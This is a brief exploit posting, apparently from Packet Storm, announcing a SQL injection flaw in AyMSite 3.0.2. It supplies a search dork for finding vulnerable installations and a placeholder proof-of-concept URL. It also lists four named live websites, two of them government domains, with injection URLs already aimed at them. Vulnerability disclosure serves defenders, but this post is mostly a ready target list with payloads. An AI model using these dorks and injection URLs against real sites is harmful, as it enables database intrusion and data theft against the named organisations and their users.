AyMSite version 3.0.2 suffers from a remote SQL injection vulnerability.
6b66a8dd7f1764082306120df511ffb1f5be8ba8b8ca1f8ba70f07535daa6bc6##################################################
# Exploit Title: AyMSite V 3.0.2 [ sqli ]
# Vendor: https://www.aymsoft.com/
# Date: 08/06/2012
# Author: xDarkSton3x
#Dork: inurl:aym_index.php?option=
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Example Sites :
https://www.satena.gov.co/aym_index.php?option=ciudadano&pag_cat_id=3&pag_id=%27
https://www.cartagenamusicfestival.com/aym_index.php?option=artists&alr=&pag_id=%27
https://www.sht.com.co/aym_index.php?option=servicios&pag_cat_id=5&pag_id=%27
https://www.findeter.gov.co/aymsite/aym_index.php?&option=servicios&pag_cat_id=%27
##################################################
[~]Exploit/p0c :
https://www.site.com/aym_index.php?option=var=&var2=[sqli]
Greetz: [ Insecurity Peru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed